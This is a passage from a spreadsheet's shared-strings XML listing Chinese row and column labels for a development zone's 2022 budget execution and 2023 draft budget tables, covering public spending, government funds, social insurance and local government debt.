    <t xml:space="preserve">      引进人才费用</t>
  </si>
  <si>
    <t xml:space="preserve">      其他人力资源和社会保障管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    民政管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      社会组织管理</t>
  </si>
  <si>
    <t xml:space="preserve">      基层政权建设和社区治理</t>
  </si>
  <si>
    <t xml:space="preserve">      其他民政管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    行政事业单位养老支出</t>
  </si>
  <si>
    <t xml:space="preserve">      行政单位离退休</t>
  </si>
  <si>
    <t xml:space="preserve">      事业单位离退休</t>
  </si>
  <si>
    <t xml:space="preserve">      机关事业单位基本养老保险缴费支出</t>
  </si>
  <si>
    <t xml:space="preserve">      机关事业单位职业年金缴费支出</t>
  </si>
  <si>
    <t xml:space="preserve">    就业补助</t>
  </si>
  <si>
    <t xml:space="preserve">      公益性岗位补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      其他就业补助支出</t>
  </si>
  <si>
    <t xml:space="preserve">    抚恤</t>
  </si>
  <si>
    <t xml:space="preserve">      伤残抚恤</t>
  </si>
  <si>
    <t xml:space="preserve">      义务兵优待</t>
  </si>
  <si>
    <t xml:space="preserve">      其他优抚支出</t>
  </si>
  <si>
    <t xml:space="preserve">    退役安置</t>
  </si>
  <si>
    <t xml:space="preserve">      退役士兵安置</t>
  </si>
  <si>
    <t xml:space="preserve">      其他退役安置支出</t>
  </si>
  <si>
    <t xml:space="preserve">    社会福利</t>
  </si>
  <si>
    <t xml:space="preserve">      儿童福利</t>
  </si>
  <si>
    <t xml:space="preserve">      老年福利</t>
  </si>
  <si>
    <t xml:space="preserve">      殡葬</t>
  </si>
  <si>
    <t xml:space="preserve">      养老服务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他社会福利支出</t>
  </si>
  <si>
    <t xml:space="preserve">    残疾人事业</t>
  </si>
  <si>
    <t xml:space="preserve">      残疾人康复</t>
  </si>
  <si>
    <t xml:space="preserve">      残疾人生活和护理补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      其他残疾人事业支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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特困人员救助供养</t>
  </si>
  <si>
    <t xml:space="preserve">      城市特困人员救助供养支出</t>
  </si>
  <si>
    <t xml:space="preserve">      农村特困人员救助供养支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他生活救助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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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退役军人管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">    其他社会保障和就业支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他社会保障和就业支出</t>
  </si>
  <si>
    <t xml:space="preserve">  卫生健康支出</t>
  </si>
  <si>
    <t xml:space="preserve">    卫生健康管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他卫生健康管理事务支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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其他中医药支出</t>
  </si>
  <si>
    <t xml:space="preserve">    计划生育事务</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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优抚对象医疗</t>
  </si>
  <si>
    <t xml:space="preserve">      其他优抚对象医疗支出</t>
  </si>
  <si>
    <t xml:space="preserve">    医疗保障管理事务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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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环境保护管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他环境保护管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    环境监测与监察</t>
  </si>
  <si>
    <t xml:space="preserve">      其他环境监测与监察支出</t>
  </si>
  <si>
    <t xml:space="preserve">  城乡社区支出</t>
  </si>
  <si>
    <t xml:space="preserve">    城乡社区管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      城管执法</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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农林水支出</t>
  </si>
  <si>
    <t xml:space="preserve">    农业农村</t>
  </si>
  <si>
    <t xml:space="preserve">      病虫害控制</t>
  </si>
  <si>
    <t xml:space="preserve">      执法监管</t>
  </si>
  <si>
    <t xml:space="preserve">      农村社会事业</t>
  </si>
  <si>
    <t xml:space="preserve">      农村道路建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他农业农村支出</t>
  </si>
  <si>
    <t xml:space="preserve">    林业和草原</t>
  </si>
  <si>
    <t xml:space="preserve">      森林生态效益补偿</t>
  </si>
  <si>
    <t xml:space="preserve">      林业草原防灾减灾</t>
  </si>
  <si>
    <t xml:space="preserve">      其他林业和草原支出</t>
  </si>
  <si>
    <t xml:space="preserve">    水利</t>
  </si>
  <si>
    <t xml:space="preserve">      防汛</t>
  </si>
  <si>
    <t xml:space="preserve">      农村人畜饮水</t>
  </si>
  <si>
    <t xml:space="preserve">    扶贫</t>
  </si>
  <si>
    <t xml:space="preserve">      其他扶贫支出</t>
  </si>
  <si>
    <t xml:space="preserve">    农村综合改革</t>
  </si>
  <si>
    <t xml:space="preserve">      对村民委员会和村党支部的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他农村综合改革支出</t>
  </si>
  <si>
    <t xml:space="preserve">    普惠金融发展支出</t>
  </si>
  <si>
    <t xml:space="preserve">      农业保险保费补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      创业担保贷款贴息</t>
  </si>
  <si>
    <t xml:space="preserve">      其他普惠金融发展支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他农林水支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他农林水支出</t>
  </si>
  <si>
    <t xml:space="preserve">  交通运输支出</t>
  </si>
  <si>
    <t xml:space="preserve">    公路水路运输</t>
  </si>
  <si>
    <t xml:space="preserve">      公路建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他公路水路运输支出</t>
  </si>
  <si>
    <t xml:space="preserve">    邮政业支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他邮政业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    车辆购置税支出</t>
  </si>
  <si>
    <t xml:space="preserve">      车辆购置税其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">  资源勘探工业信息等支出</t>
  </si>
  <si>
    <t xml:space="preserve">    制造业</t>
  </si>
  <si>
    <t xml:space="preserve">      其他制造业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    支持中小企业发展和管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">      中小企业发展专项</t>
  </si>
  <si>
    <t xml:space="preserve">  商业服务业等支出</t>
  </si>
  <si>
    <t xml:space="preserve">    商业流通事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他商业流通事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    涉外发展服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他涉外发展服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">  自然资源海洋气象等支出</t>
  </si>
  <si>
    <t xml:space="preserve">    自然资源事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他自然资源事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">  住房保障支出</t>
  </si>
  <si>
    <t xml:space="preserve">    保障性安居工程支出</t>
  </si>
  <si>
    <t xml:space="preserve">      棚户区改造</t>
  </si>
  <si>
    <t xml:space="preserve">      保障性住房租金补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      老旧小区改造</t>
  </si>
  <si>
    <t xml:space="preserve">    住房改革支出</t>
  </si>
  <si>
    <t xml:space="preserve">      住房公积金</t>
  </si>
  <si>
    <t xml:space="preserve">  灾害防治及应急管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">    应急管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      安全监管</t>
  </si>
  <si>
    <t xml:space="preserve">      应急救援</t>
  </si>
  <si>
    <t xml:space="preserve">      其他应急管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">    消防事务</t>
  </si>
  <si>
    <t xml:space="preserve">      消防应急救援</t>
  </si>
  <si>
    <t xml:space="preserve">      其他消防事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">  债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府一般债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方政府一般债券付息支出</t>
  </si>
  <si>
    <t>预备费</t>
  </si>
  <si>
    <t>表16</t>
  </si>
  <si>
    <t>2023年经技区一般公共预算重点项目支出表</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>金  额</t>
  </si>
  <si>
    <t xml:space="preserve">       合    计</t>
  </si>
  <si>
    <t>企业退休职工养老金财政补助</t>
  </si>
  <si>
    <t>表17</t>
  </si>
  <si>
    <t>2022年经技区政府性基金预算收入执行情况表</t>
  </si>
  <si>
    <t>项      目</t>
  </si>
  <si>
    <t>一、港口建设费收入</t>
  </si>
  <si>
    <t>二、国有土地使用权出让收入</t>
  </si>
  <si>
    <t>三、彩票公益金收入</t>
  </si>
  <si>
    <t>四、城市基础设施配套费收入</t>
  </si>
  <si>
    <t>五、污水处理费收入</t>
  </si>
  <si>
    <t>六、彩票发行机构和彩票销售机构的业务费用</t>
  </si>
  <si>
    <t>七、专项债券对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府专项债务转贷收入</t>
  </si>
  <si>
    <t xml:space="preserve">    上级补助收入</t>
  </si>
  <si>
    <t>表18</t>
  </si>
  <si>
    <t>2022年经技区政府性基金预算支出执行情况表</t>
  </si>
  <si>
    <t>一、文化旅游体育传媒支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国家电影事业发展专项资金收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    旅游发展基金支出</t>
  </si>
  <si>
    <t>二、社会保障和就业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    大中型水库移民后期扶持基金支出</t>
  </si>
  <si>
    <t>三、城乡社区支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有土地使用权出让收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有土地收益基金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    农业土地开发资金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    城市基础设施配套费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    污水处理费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    土地储备专项债券收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    棚户区改造专项债券收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有土地使用权出让收入对应专项债务收入安
    排的支出</t>
  </si>
  <si>
    <t>四、农林水支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国家重大水利工程建设基金安排的支出</t>
  </si>
  <si>
    <t>五、交通运输支出</t>
  </si>
  <si>
    <t xml:space="preserve">    港口建设费及对应债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    民航发展基金支出</t>
  </si>
  <si>
    <t>六、其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他政府性基金及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    彩票发行销售机构业务费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    彩票公益金安排的支出</t>
  </si>
  <si>
    <t>七、债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有土地使用权出让金债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">    土地储备专项债券付息支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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地方政府专项债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    调出资金</t>
  </si>
  <si>
    <t xml:space="preserve">    支出总计</t>
  </si>
  <si>
    <t>表19</t>
  </si>
  <si>
    <t>2022年经技区政府性基金预算转移支付分项目执行情况表</t>
  </si>
  <si>
    <t>大中型水库移民后期扶持基金</t>
  </si>
  <si>
    <t>国有土地使用权出让收入</t>
  </si>
  <si>
    <t>国家重大水利工程建设基金</t>
  </si>
  <si>
    <t>民航发展基金</t>
  </si>
  <si>
    <t>彩票公益金</t>
  </si>
  <si>
    <t>其他政府性基金及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t>表20</t>
  </si>
  <si>
    <t>2022年经技区政府性基金预算重点项目执行情况表</t>
  </si>
  <si>
    <t>项   目</t>
  </si>
  <si>
    <t>地方政府专项债券还本付息</t>
  </si>
  <si>
    <t>学校建设及重点项目拆迁</t>
  </si>
  <si>
    <t>乡村振兴工作经费</t>
  </si>
  <si>
    <t>城市基础设施维护费</t>
  </si>
  <si>
    <t>2022年学校教育设备采购</t>
  </si>
  <si>
    <t>城乡公交运营财政补贴</t>
  </si>
  <si>
    <t>表21</t>
  </si>
  <si>
    <t>2023年经技区政府性基金预算收入草案表</t>
  </si>
  <si>
    <t>一、国有土地使用权出让收入</t>
  </si>
  <si>
    <t>二、彩票公益金收入</t>
  </si>
  <si>
    <t>三、城市基础设施配套费收入</t>
  </si>
  <si>
    <t>四、污水处理费收入</t>
  </si>
  <si>
    <t>五、彩票发行机构和彩票销售机构的业务费用</t>
  </si>
  <si>
    <t>六、专项债券对应项目专项收入</t>
  </si>
  <si>
    <t>表22</t>
  </si>
  <si>
    <t>2023年经技区政府性基金预算支出草案表</t>
  </si>
  <si>
    <t>一、文化体育传媒支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国家电影事业发展专项资金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有土地使用权出让收入对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t>五、其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">    彩票公益金及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t>六、债务付息支出</t>
  </si>
  <si>
    <t>表23</t>
  </si>
  <si>
    <t>2023年经技区政府性基金预算支出草案表（按功能分类）</t>
  </si>
  <si>
    <t>一、社会保障和就业支出</t>
  </si>
  <si>
    <t xml:space="preserve">  大中型水库移民后期扶持基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">     基础设施建设和经济发展</t>
  </si>
  <si>
    <t>二、城乡社区支出</t>
  </si>
  <si>
    <t>国有土地使用权出让收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">   征地和拆迁补偿支出</t>
  </si>
  <si>
    <t xml:space="preserve">  土地开发支出</t>
  </si>
  <si>
    <t xml:space="preserve">  城市建设支出</t>
  </si>
  <si>
    <t xml:space="preserve">  农村基础设施建设支出</t>
  </si>
  <si>
    <t xml:space="preserve">  农村社会事业支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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城市基础设施配套费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">     城市公共设施</t>
  </si>
  <si>
    <t xml:space="preserve">  污水处理费收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">     污水处理设施建设和运营</t>
  </si>
  <si>
    <t xml:space="preserve">  棚户区改造专项债券收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">     土地开发支出  </t>
  </si>
  <si>
    <t xml:space="preserve">  国有土地使用权出让收入对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">     其他国有土地使用权出让收入对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t>三、其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">  其他政府性基金及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">     其他地方自行试点项目收益专项债券收入安排的支出  </t>
  </si>
  <si>
    <t>彩票发行销售机构业务费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">  福利彩票销售机构的业务费支出</t>
  </si>
  <si>
    <t xml:space="preserve">  彩票市场调控资金支出</t>
  </si>
  <si>
    <t>彩票公益金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">  用于社会福利的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">  用于体育事业的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">  用于残疾人事业的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">  用于其他社会公益事业的彩票公益金支出</t>
  </si>
  <si>
    <t>四、债务付息支出</t>
  </si>
  <si>
    <t>地方政府专项债务付息支出</t>
  </si>
  <si>
    <t>国有土地使用权出让金债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">  国有土地使用权出让金债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">   棚户区改造专项债券付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">   其他地方自行试点项目收益专项债券付息支出</t>
  </si>
  <si>
    <t>本年基金支出合计</t>
  </si>
  <si>
    <t>表24</t>
  </si>
  <si>
    <t>2023年经技区政府性基金预算支出草案表(按经济分类)</t>
  </si>
  <si>
    <t>一、机关商品和服务支出</t>
  </si>
  <si>
    <t>二、机关资本性支出（一）</t>
  </si>
  <si>
    <t xml:space="preserve">    房屋建筑物购建</t>
  </si>
  <si>
    <t xml:space="preserve">    土地征迁补偿和安置支出</t>
  </si>
  <si>
    <t xml:space="preserve">    大型修缮</t>
  </si>
  <si>
    <t>三、对事业单位经常性补助</t>
  </si>
  <si>
    <t>四、对事业单位资本性补助</t>
  </si>
  <si>
    <t>五、对企业补助</t>
  </si>
  <si>
    <t xml:space="preserve">    利息补贴</t>
  </si>
  <si>
    <t>六、对企业资本性支出</t>
  </si>
  <si>
    <t xml:space="preserve">    对企业资本性支出（一）</t>
  </si>
  <si>
    <t>八、债务利息及费用支出</t>
  </si>
  <si>
    <t>表25</t>
  </si>
  <si>
    <t>2023年经技区政府性基金预算重点项目支出表</t>
  </si>
  <si>
    <t xml:space="preserve">        合    计</t>
  </si>
  <si>
    <t>表26</t>
  </si>
  <si>
    <t>2022年经技区国有资本经营预算收入执行情况表</t>
  </si>
  <si>
    <t>金额</t>
  </si>
  <si>
    <t>比上年增长</t>
  </si>
  <si>
    <t>一、利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">    石油石化企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">    房地产企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">    其他国有资本经营预算企业利润收入</t>
  </si>
  <si>
    <t>二、股利、股息收入</t>
  </si>
  <si>
    <t xml:space="preserve">    国有参股公司股利、股息收入</t>
  </si>
  <si>
    <t>备注：根据国发〔2021〕5号文件规定，全市不编制2022年国有资本经营预算。</t>
  </si>
  <si>
    <t>表27</t>
  </si>
  <si>
    <t>2022年经技区国有资本经营预算支出执行情况表</t>
  </si>
  <si>
    <t>国有资本经营预算支出</t>
  </si>
  <si>
    <t xml:space="preserve">    解决历史遗留问题及改革成本支出</t>
  </si>
  <si>
    <t xml:space="preserve">        国有企业办职教幼教补助支出</t>
  </si>
  <si>
    <t xml:space="preserve">        国有企业退休人员社会化管理补助支出</t>
  </si>
  <si>
    <t xml:space="preserve">        其他解决历史遗留问题及改革成本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有企业资本金注入</t>
  </si>
  <si>
    <t xml:space="preserve">        其他国有企业资本金注入</t>
  </si>
  <si>
    <t xml:space="preserve">    国有企业政策性补贴</t>
  </si>
  <si>
    <t xml:space="preserve">        国有企业政策性补贴</t>
  </si>
  <si>
    <t xml:space="preserve">    其他国有资本经营预算支出</t>
  </si>
  <si>
    <t xml:space="preserve">        其他国有资本经营预算支出</t>
  </si>
  <si>
    <t>表28</t>
  </si>
  <si>
    <t>2022年经技区国有资本经营预算转移支付分区市分项目执行情况表</t>
  </si>
  <si>
    <t>国有企业退休人员
社会化管理支出</t>
  </si>
  <si>
    <t>表29</t>
  </si>
  <si>
    <t>2023年经技区国有资本经营预算收入草案表</t>
  </si>
  <si>
    <t xml:space="preserve">     国有参股公司股利、股息收入</t>
  </si>
  <si>
    <t xml:space="preserve">     其他国有资本经营预算企业股利、股息收入</t>
  </si>
  <si>
    <t>备注：根据国发〔2021〕5号文件规定，全市不编制2023年国有资本经营预算。</t>
  </si>
  <si>
    <t>表30</t>
  </si>
  <si>
    <t>2023年经技区国有资本经营预算支出草案表</t>
  </si>
  <si>
    <t>表31</t>
  </si>
  <si>
    <t>2022年经技区社会保险基金预算收入执行情况表</t>
  </si>
  <si>
    <t>项        目</t>
  </si>
  <si>
    <t>一、机关事业单位基本养老保险基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">    保险费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    利息收入</t>
  </si>
  <si>
    <t xml:space="preserve">    财政补贴收入</t>
  </si>
  <si>
    <t xml:space="preserve">    其他收入</t>
  </si>
  <si>
    <t xml:space="preserve">    转移收入</t>
  </si>
  <si>
    <t>二、居民基本养老保险基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">    委托投资收益</t>
  </si>
  <si>
    <t>三、职工基本医疗保险基金收入</t>
  </si>
  <si>
    <t>四、居民基本医疗保险基金收入</t>
  </si>
  <si>
    <t>五、工伤保险基金收入</t>
  </si>
  <si>
    <t>六、失业保险基金收入</t>
  </si>
  <si>
    <t>社会保险基金收入合计</t>
  </si>
  <si>
    <t>上年结转收入</t>
  </si>
  <si>
    <t>表32</t>
  </si>
  <si>
    <t>2022年经技区社会保险基金预算支出执行情况表</t>
  </si>
  <si>
    <t>一、机关事业单位基本养老保险基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    基本养老金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    转移支出</t>
  </si>
  <si>
    <t>二、居民基本养老保险基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    基础养老金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    个人账户养老金支出</t>
  </si>
  <si>
    <t>三、职工基本医疗保险基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    基本医疗保险待遇支出—住院支出</t>
  </si>
  <si>
    <t xml:space="preserve">    基本医疗保险待遇支出—门诊支出</t>
  </si>
  <si>
    <t xml:space="preserve">    生育医疗费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">    生育津贴支出</t>
  </si>
  <si>
    <t>四、居民基本医疗保险基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    大病保险支出</t>
  </si>
  <si>
    <t>五、工伤保险基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    工伤保险待遇支出</t>
  </si>
  <si>
    <t xml:space="preserve">    劳动能力鉴定支出</t>
  </si>
  <si>
    <t xml:space="preserve">    工伤预防费用支出</t>
  </si>
  <si>
    <t>六、失业保险基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    失业保险金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    基本医疗保险费支出</t>
  </si>
  <si>
    <t xml:space="preserve">    丧葬抚恤金和补助金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">    稳定岗位补贴支出</t>
  </si>
  <si>
    <t xml:space="preserve">    技能提升补贴支出</t>
  </si>
  <si>
    <t>社会保险基金支出合计</t>
  </si>
  <si>
    <t>年终结转结余</t>
  </si>
  <si>
    <t xml:space="preserve">    其中：当年结转结余</t>
  </si>
  <si>
    <t>表33</t>
  </si>
  <si>
    <t>2022年末经技区社会保险基金预算结余执行情况表</t>
  </si>
  <si>
    <t>社会保险基金年末滚存结余合计</t>
  </si>
  <si>
    <t>一、机关事业单位基本养老保险基金</t>
  </si>
  <si>
    <t>二、居民基本养老保险基金</t>
  </si>
  <si>
    <t>三、职工基本医疗保险基金</t>
  </si>
  <si>
    <t>四、居民基本医疗保险基金</t>
  </si>
  <si>
    <t>五、工伤保险基金</t>
  </si>
  <si>
    <t>六、失业保险基金</t>
  </si>
  <si>
    <t>表34</t>
  </si>
  <si>
    <t>2023年经技区社会保险基金预算收入草案表</t>
  </si>
  <si>
    <t>表35</t>
  </si>
  <si>
    <t>2023年经技区社会保险基金预算支出草案表</t>
  </si>
  <si>
    <t>表36</t>
  </si>
  <si>
    <t>2023年末经技区社会保险基金预算结余草案表</t>
  </si>
  <si>
    <t>表37</t>
  </si>
  <si>
    <t>2022年经技区地方政府债务限额余额及还本付息情况表</t>
  </si>
  <si>
    <t>一、2021年末地方政府债务余额</t>
  </si>
  <si>
    <t xml:space="preserve">   其中：一般债务</t>
  </si>
  <si>
    <t xml:space="preserve">        专项债务</t>
  </si>
  <si>
    <t>二、2022年地方政府债务举借额</t>
  </si>
  <si>
    <t xml:space="preserve">   （一）政府债券</t>
  </si>
  <si>
    <t xml:space="preserve">        新增一般债券发行额</t>
  </si>
  <si>
    <t xml:space="preserve">        再融资一般债券发行额</t>
  </si>
  <si>
    <t xml:space="preserve">        新增专项债券发行额</t>
  </si>
  <si>
    <t xml:space="preserve">        再融资专项债券发行额</t>
  </si>
  <si>
    <t xml:space="preserve">   （二）外债举借额</t>
  </si>
  <si>
    <t>三、2022年地方政府债务还本额</t>
  </si>
  <si>
    <t xml:space="preserve">   其中：一般债务还本额</t>
  </si>
  <si>
    <t xml:space="preserve">           其中：向外国政府及国际组织借款还本额</t>
  </si>
  <si>
    <t xml:space="preserve">        专项债务还本额</t>
  </si>
  <si>
    <t>四、2022年地方政府债务付息</t>
  </si>
  <si>
    <t xml:space="preserve">   其中：一般债务付息</t>
  </si>
  <si>
    <t xml:space="preserve">           其中：向外国政府及国际组织借款付息</t>
  </si>
  <si>
    <t xml:space="preserve">        专项债务付息</t>
  </si>
  <si>
    <t>五、2022年末地方政府债务余额</t>
  </si>
  <si>
    <t xml:space="preserve">         专项债务</t>
  </si>
  <si>
    <t>六、2022年地方政府债务限额</t>
  </si>
  <si>
    <t>表38</t>
  </si>
  <si>
    <t>2022年经技区地方政府债务限额及余额分区市执行情况明细表</t>
  </si>
  <si>
    <t>地   区</t>
  </si>
  <si>
    <t>2022年债务限额</t>
  </si>
  <si>
    <t>2022年债务余额</t>
  </si>
  <si>
    <t>一般债务</t>
  </si>
  <si>
    <t>专项债务</t>
  </si>
  <si>
    <t>经  区</t>
  </si>
  <si>
    <t>表39</t>
  </si>
  <si>
    <t>2022年经技区地方政府债券分配情况表</t>
  </si>
  <si>
    <t>一般债券额度</t>
  </si>
  <si>
    <t>专项债券额度</t>
  </si>
  <si>
    <t>小  计</t>
  </si>
  <si>
    <t>新增
一般债券</t>
  </si>
  <si>
    <t>再融资
一般债券</t>
  </si>
  <si>
    <t>新增
专项债券</t>
  </si>
  <si>
    <t>再融资
专项债券</t>
  </si>
  <si>
    <t>表40</t>
  </si>
  <si>
    <t>2022年经技区地方政府债券发行情况表</t>
  </si>
  <si>
    <t>债券类型</t>
  </si>
  <si>
    <t>发行日期</t>
  </si>
  <si>
    <t>债券种类</t>
  </si>
  <si>
    <t>年限</t>
  </si>
  <si>
    <t>利率</t>
  </si>
  <si>
    <t>发行量</t>
  </si>
  <si>
    <t>新增债券小计</t>
  </si>
  <si>
    <t>新增债券</t>
  </si>
  <si>
    <t>专项债券</t>
  </si>
  <si>
    <t>再融资债券小计</t>
  </si>
  <si>
    <t>再融资债券</t>
  </si>
  <si>
    <t>一般债券</t>
  </si>
  <si>
    <t>表41</t>
  </si>
  <si>
    <t>2022年末经技区地方政府债券年限情况表</t>
  </si>
  <si>
    <t>地区</t>
  </si>
  <si>
    <t>项目</t>
  </si>
  <si>
    <t>类型</t>
  </si>
  <si>
    <t>2022年末
余额</t>
  </si>
  <si>
    <t>债务期限</t>
  </si>
  <si>
    <t>3年期</t>
  </si>
  <si>
    <t>5年期</t>
  </si>
  <si>
    <t>7年期</t>
  </si>
  <si>
    <t>10年期</t>
  </si>
  <si>
    <t>15年期</t>
  </si>
  <si>
    <t>20年期</t>
  </si>
  <si>
    <t>30年期</t>
  </si>
  <si>
    <t>经区</t>
  </si>
  <si>
    <t>置换债券</t>
  </si>
  <si>
    <t>表42</t>
  </si>
  <si>
    <t>2022年经技区地方政府新增一般债券使用情况表</t>
  </si>
  <si>
    <t>全  市</t>
  </si>
  <si>
    <t>市本级</t>
  </si>
  <si>
    <t>1.铁路</t>
  </si>
  <si>
    <t>2.公路</t>
  </si>
  <si>
    <t>3.机场</t>
  </si>
  <si>
    <t>4.市政建设</t>
  </si>
  <si>
    <t>5.保障性住房</t>
  </si>
  <si>
    <t xml:space="preserve">   其中：棚户区改造</t>
  </si>
  <si>
    <t>6.生态建设和环境保护</t>
  </si>
  <si>
    <t>7.政权建设</t>
  </si>
  <si>
    <t>8.教育</t>
  </si>
  <si>
    <t>9.科学</t>
  </si>
  <si>
    <t>10.文化</t>
  </si>
  <si>
    <t>11.医疗卫生</t>
  </si>
  <si>
    <t>12.社会保障</t>
  </si>
  <si>
    <t>13.农林水利建设</t>
  </si>
  <si>
    <t>14.自然灾害防治体系建设</t>
  </si>
  <si>
    <t>15.其他</t>
  </si>
  <si>
    <t>注：经区2022年度没有新增一般债券。</t>
  </si>
  <si>
    <t>表43</t>
  </si>
  <si>
    <t>2022年经技区地方政府新增专项债券使用情况表</t>
  </si>
  <si>
    <t>表44</t>
  </si>
  <si>
    <t>2022年经技区新增政府债券和政府外贷分项目安排情况表</t>
  </si>
  <si>
    <t xml:space="preserve">
地   区
</t>
  </si>
  <si>
    <t>新增债券和政府外贷安排情况</t>
  </si>
  <si>
    <t>实际支出金额</t>
  </si>
  <si>
    <t>地方政府新增债券小计</t>
  </si>
  <si>
    <t>新增一般
债券</t>
  </si>
  <si>
    <t>新增专项债券</t>
  </si>
  <si>
    <t>政府外贷</t>
  </si>
  <si>
    <t>小计</t>
  </si>
  <si>
